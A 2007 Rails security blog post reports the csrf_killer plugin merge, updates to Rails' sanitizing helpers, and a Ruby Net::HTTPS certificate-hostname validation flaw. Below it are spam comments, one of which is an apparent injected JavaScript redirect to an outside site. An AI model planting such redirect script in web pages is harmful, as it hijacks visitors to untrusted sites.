Welcome

The Ruby on Rails Security Project wants to make Rails (applications) more secure. Heiko Webers of bauland42 writes blog posts about Rails and security related topics and carries out security audits for your web applications. We have a free book for you, too. Contact Heiko at 42 -the AT sign- bauland42.de.

Search
Feeds / Syndication
« ActionPack: Security | Main | Ruby on Rails Security Cheatsheet »
Saturday
29Sep

Plugins merged and Ruby’s Net::HTTPS

Good news: The csrf_killer plugin has been merged by Rick for Rails 2.0, so it is available in the current trunk. Go here for the changeset, and here for some documentation.

Furthermore, the insecure text helper methods strip_links, strip_tags and sanitize have been updated, mostly to strip nested tags. Still, I don't recommend using them, as new tickets (same applies for strip_tags) are coming in for this fresh change.

And for those of you using the Ruby Net::HTTP and Net::HTTPS libraries, here is a security vulnerability in it (it's for Ruby, not Rails):

  • A vulnerability results from the Net::HTTPS library failing to validate the name on the SSL certificate against the DNS name requested by the user. By not validating the name, the library allows an attacker to present a cryptographically valid certificate with an invalid CN.
Update: There's a post on the official Ruby site now.

PrintView Printer Friendly Version

EmailEmail Article to Friend

Reader Comments (2)

Buy cheap RS gold,we are a professional, loyal and reliable and Runescape gold supplier online--24/7 non-stop service, cheap ,cheapest runescape money and with fast delivery.
24/7 Shop -Fast,Reliable,Cheap Runescape Money|Runescape Gold| - runescape money, runescape gold, runescape items, ..
RS gold site is selling RuneScape gold and RuneScape item,offering RuneScape money, RuneScape gold and RuneScape 2 Gold are collected ...

January 12, 2008 | Unregistered Commenterrunescape gold

|
rutester
document.location='http://megasearchers.org/in.cgi?3';

January 29, 2008 | Unregistered CommenterMaravoivy

PostPost a New Comment

Enter your information below to add a new comment.

My response is on my own website »
Author Email (optional):
Author URL (optional):
Post:
 
Some HTML allowed: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong>